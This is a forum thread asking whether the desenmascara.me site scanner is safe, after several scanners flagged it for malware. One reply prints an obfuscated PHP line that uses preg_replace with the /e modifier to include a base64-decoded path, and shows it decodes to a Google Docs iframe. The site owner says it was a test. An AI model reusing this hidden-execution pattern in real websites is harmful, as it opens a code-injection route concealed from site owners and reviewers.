Is the desenmascara dot me website scanner safe?

Viruses and worms
1

Site advisor says it has suspicious site behavior, also medium risk here: http://www.siteadvisor.com/restricted.html?domain=http:%2F%2Fdesenmascara.me%2F&originalURL=-922351519&pip=false&premium=false&client_uid=2862654286&client_ver=3.6.6.129&client_type=IEPlugin&suite=false&aff_id=662-12&locale=nl_nl&ui=1&os_ver=6.2.0.0
and http://www.mcafee.com/threat-intelligence/domain/?domain=desenmascara.me
Given as infested by Sucuri’s: http://sitecheck.sucuri.net/results/desenmascara.me
Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwjs2368?v2
6 instances of this malcode: http://labs.sucuri.net/db/malware/malware-entry-mwjs2368?v2
Or is this a FP? → https://www.virustotal.com/en/url/7e7df34622a6ef5c88e2b3b86ad034a4178c6cb25de3bc819fac10a632882307/analysis/1403953989/
and http://www.quttera.com/detailed_report/desenmascara.me

polonus

2

If the infection is what sucuri states, the site has been hacked and backdoored, after which known javascript has been inserted a la the TimThumb compromittal malcode → http://labs.sucuri.net/db/malware/malware-entry-mwjs2368?v2
and http://blog.sucuri.net/2011/08/mass-infection-of-wordpress-sites-counter-wordpress-com.html

Can anyone confirm this backend malscript infection? The malscript follows

Carga datos iniciales dinamicos–

polonus

3

It looks like its hacked…

Kaspersky is just sleeping about it in my VM :frowning:

4

This is the code:

 <?php @preg_replace("@(.+)@ie","include(base64_decode("\1"));","L2hvbWUvY2lmb29yZy9wdWJsaWNfaHRtbC9wbHVnaW5zL2VkaXRvcnMvdGlueW1jZS90ZW1wbGF0ZXMvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==");

Decoded results:

 document.write(unescape('<iframe src="htxps://docs.google.com/file/d/0B2L8ST0QDvOjR0tvZXZ3ak5pTVk/preview" width="670" height="450"></iframe>'));

A quite harmless preview link…

polonus

5

Hi,

I am the desenmascara.me owner, it is safe as pointed out above! :slight_smile:
the obfuscate code is legitimate it is even commented. It was a test in order to see how security scanners such as sucuri behaviour.

Regards

6

Better question, how should we be taking this?

7

As I stated above quite harmless code when deobfuscated, and external links check also OK:
http://desenmascara.me links to the following External Domains:
==>ajax.googleapis.com
==>malsup.github.com
==>google.com
==>jquery.malsup.com
and https://www.blackhat.com/eu-14/arsenal.html#desenmascara-me
http://emiliocasbas.net/ via http://emiliocasbas.net → ‘emiliocasbas.net

polonus